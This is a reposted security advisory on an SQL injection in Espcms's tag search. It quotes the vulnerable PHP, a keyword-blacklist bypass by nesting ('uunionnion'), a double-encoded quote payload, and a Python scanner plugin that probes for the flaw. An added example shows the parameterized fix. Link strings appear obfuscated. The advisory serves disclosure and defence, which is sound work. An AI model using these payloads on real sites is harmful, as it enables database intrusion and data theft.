[Repost] Espcms SQL injection vulnerability (all versions)
Posted on: 2013-3-12 14:57
Reposted from: c2cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4W2j5Y4g2Y4i4K6u0W2L8X3g2@1i4K6u0r3N6Y4g2D9k6r3u0Q4x3V1k6K6M7%4k6A6k6q4)9J5k6o6j5H3y4U0M7J5
Date: 2013-03-11
Details
The vulnerability exists in the in_taglist() function of both interface/search.php and interface/3gwap_search.php; the problem is identical in each, so interface/search.php is used as the example:
function in_taglist() {
    parent::start_pagetemplate();
    include_once admin_ROOT . 'public/class_pagebotton.php';
    $page = $this->fun->accept('page', 'G');
    $page = isset($page) ? intval($page) : 1;
    $lng = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG;
    // tagkey is read from $_REQUEST, URL-decoded a second time, then passed through the keyword filter
    $tagkey = urldecode($this->fun->accept('tagkey', 'R'));
    $tagkey = $this->fun->inputcodetrim($tagkey);
    $db_where = ' WHERE lng=\'' . $lng . '\' AND isclass=1';
    if (empty($tagkey)) {
        $linkURL = $_SERVER['HTTP_REFERER'];
        $this->callmessage($this->lng['search_err'], $linkURL, $this->lng['gobackbotton']);
    }
    if (!empty($tagkey)) {
        // user-controlled value spliced directly into the WHERE clause
        $db_where.=" AND FIND_IN_SET('$tagkey',tags)";
    }
    $pagemax = 20;
    $pagesylte = 1;
    $templatesDIR = $this->get_templatesdir('article');
    $templatefilename = $lng . '/' . $templatesDIR . '/search';
    $db_table = db_prefix . 'document';
    // first query: count(*) built from $db_where
    $countnum = $this->db_numrows($db_table, $db_where);
    if ($countnum > 0) {
        $numpage = ceil($countnum / $pagemax);
    } else {
        $numpage = 1;
    }
    // second query: the row fetch, also built from $db_where
    $sql = "SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle, color,author,source,pic,link,oprice,bprice,click,description,keywords,addtime,template,filename,filepath FROM $db_table $db_where LIMIT 0,$pagemax";
    $this->htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON['file_fileex'], 5, $this->lng['pagebotton'], $this->lng['gopageurl'], $this->CON['is_rewrite']);
    $sql = $this->htmlpage->PageSQL('pid,did', 'down');
    $rs = $this->db->query($sql);
    while ($rsList = $this->db->fetch_assoc($rs)) {
        // ... the remainder of the loop body and of the function is cut off in the original post
    }
}
Because the $tagkey variable is passed through urldecode(), GPC escaping can be bypassed, and $tagkey ends up inside the SQL statement:
$db_where.=" AND FIND_IN_SET('$tagkey',tags)";
Further down,
$sql = "SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle,color,author,source,pic,link,oprice,bprice,click,description,keywords,addtime,template,filename,filepath FROM $db_table $db_where LIMIT 0,$pagemax";
is also run against the database, so both statements are injectable, and the second one can actually return data. However, espcms does not display SQL errors in its default configuration, the first statement only returns count(*), i.e. an int, and, more annoyingly, if the first query errors out the second one is never executed. So the only option is blind injection through the first statement.
Vulnerability test EXP: b9dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3g2K6M7r3y4E0M7#2)9J5c8X3W2F1k6r3g2^5i4K6u0W2M7r3S2H3i4K6y4r3j5h3y4Q4x3@1c8K6k6h3q4J5j5$3S2Q4x3U0k6S2N6q4)9K6c8s2c8S2k6$3I4A6M7%4c8Q4x3U0k6@1j5h3N6C8k6i4W2Q4x3@1c8S2i4K6t1#2x3U0f1J5y4H3`.`.
espcms itself has an anti-injection function, inputcodetrim() in public\class_function.php:
function inputcodetrim($str) {
    if (empty($str))
        return $str;
    // HTML entity names appear decoded in the extracted post; reconstructed here
    $str = str_replace("&", "&amp;", $str);
    $str = str_replace(">", "&gt;", $str);
    $str = str_replace("<", "&lt;", $str);
    $str = str_replace("<", "&lt;", $str); // this line is duplicated in the post as extracted
    // SQL keyword blacklist: each keyword is removed once, case-insensitively
    $str = str_ireplace("select", "", $str);
    $str = str_ireplace("join", "", $str);
    $str = str_ireplace("union", "", $str);
    $str = str_ireplace("where", "", $str);
    $str = str_ireplace("insert", "", $str);
    $str = str_ireplace("delete", "", $str);
    $str = str_ireplace("update", "", $str);
    $str = str_ireplace("like", "", $str);
    $str = str_ireplace("drop", "", $str);
    $str = str_ireplace("create", "", $str);
    $str = str_ireplace("modify", "", $str);
    $str = str_ireplace("rename", "", $str);
    $str = str_ireplace("count", "", $str);
    $str = str_ireplace("from", "", $str);
    $str = str_ireplace("group by", "", $str);
    $str = str_ireplace("concat", "", $str);
    $str = str_ireplace("alter", "", $str);
    $str = str_ireplace("cas", "cast", $str);
    // HTML attribute stripping, unrelated to SQL
    $str = preg_replace("/<span[^>]+>/i", "<span>", $str);
    $str = preg_replace("/<p[^>]+>/i", "<p>", $str);
    $str = preg_replace("/<font[^>]+>/i", "<font>", $str);
    $str = preg_replace("/width=(\'|\")?[\d%]+(\'|\")?/i", "", $str);
    $str = preg_replace("/height=(\'|\")?[\d%]+(\'|\")?/i", "", $str);
    $str = preg_replace("'<style[^\f]*?(\/style>)'si", "", $str);
    return $str;
}
It only replaces the keywords with an empty string, so writing union as uunionnion, for example, gets past the built-in filter; this also gets past WAFs that do not block single quotes.
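The two weaknesses described above, as an added example that is not part of the original post or of espcms: a single-pass keyword blacklist rejoins around the removed word, urldecode() after GPC escaping restores an encoded quote, and the parameterized FIND_IN_SET query is the fix. The check() helper, the document table, its rows, the lng value and the SQLite emulation of FIND_IN_SET are assumptions made for the demo (requires the pdo_sqlite extension).

```php
<?php
// Added example (not espcms code): why the inputcodetrim()-style blacklist and the
// urldecode() step in in_taglist() fail, and the parameterized form of the query.
function check(bool $ok, string $what): void {
    if (!$ok) { throw new RuntimeException("check failed: $what"); }
}

// Same idea as inputcodetrim(): each keyword is removed once, in a single pass.
function blacklist_strip(string $s): string {
    foreach (['select', 'union', 'where', 'from', 'concat'] as $kw) {
        $s = str_ireplace($kw, '', $s);
    }
    return $s;
}

// Order of operations in in_taglist(): GPC escaping (addslashes stands in for
// magic_quotes_gpc) runs before urldecode(), so an encoded quote is never escaped.
function original_pipeline(string $request_value): string {
    return blacklist_strip(urldecode(addslashes($request_value)));
}

// Removing the inner "union" from "uunionnion" leaves "u" . "nion" = "union".
check(blacklist_strip('uunionnion') === 'union', 'single pass strip rejoins');
// PHP already decoded ?tagkey=a%2527 once, so the request value is "a%27": there is
// no quote for addslashes to escape, and urldecode() then yields the raw quote.
check(original_pipeline('a%27') === "a'", 'double-encoded quote survives GPC');

// Hardened form: bind the tag as a parameter instead of splicing it into $db_where.
function search_by_tag(PDO $db, string $lng, string $tagkey): array {
    $stmt = $db->prepare('SELECT did, title FROM document'
        . ' WHERE lng = ? AND isclass = 1 AND FIND_IN_SET(?, tags)');
    $stmt->execute([$lng, $tagkey]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// SQLite has no FIND_IN_SET; emulate MySQL's (1-based position, 0 if absent) so the
// query runs offline. The table and rows are constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->sqliteCreateFunction('FIND_IN_SET', function ($needle, $list) {
    $pos = array_search((string) $needle, explode(',', (string) $list), true);
    return $pos === false ? 0 : $pos + 1;
});
$db->exec('CREATE TABLE document (did INTEGER, lng TEXT, isclass INTEGER, tags TEXT, title TEXT)');
$db->exec("INSERT INTO document VALUES (1,'cn',1,'php,cms','Doc one'), (2,'cn',1,'news','Doc two')");

check(count(search_by_tag($db, 'cn', 'php')) === 1, 'normal tag lookup');
check(count(search_by_tag($db, 'cn', "php') OR 1=1 -- ")) === 0, 'bound value is data');
echo "all checks passed\n";
```

Run with `php example.php`; the hostile tag value is compared literally against the tag list and matches no row, which is the behaviour the spliced $db_where lacks.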
<* Refer 557K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3y4F1M7$3g2S2P5g2)9J5k6h3y4G2L8g2)9J5c8X3q4J5j5$3S2A6N6X3g2K6i4K6u0r3x3U0x3^5x3H3`.`. >
Exploit:
#!/usr/bin/env python
# Scanner plugin: curl and security_info are supplied by the framework's dummy module
import re
import urlparse


def assign(service, arg):
    if service != "espcms":
        return
    return True, arg


def audit(arg):
    url = arg
    # a double-encoded single quote reaches the query only because of the extra urldecode()
    code, head, res, errcode, _ = curl.curl(url + 'index.php?ac=search&at=taglist&tagkey=a%2527')
    if code == 200:
        m = re.search('ESPCMS SQL Error:', res)
        if m:
            # the pattern has no capture group, so report the whole match
            security_info(m.group(0))


if __name__ == '__main__':
    from dummy import *
    # assign() returns (True, url); audit() expects the url itself
    audit(assign('espcms', 'ad1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3y4F1M7$3g2S2P5g2)9J5k6h3y4G2L8g2)9J5c8W2)9J5y4#2)9J5z5g2)9#2b7U0q4Q4y4f1c8Q4x3U0V1`.')[1])
Solutions:
Wait for the official patch: a9aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2U0K9i4y4H3i4K6u0W2j5$3^5`.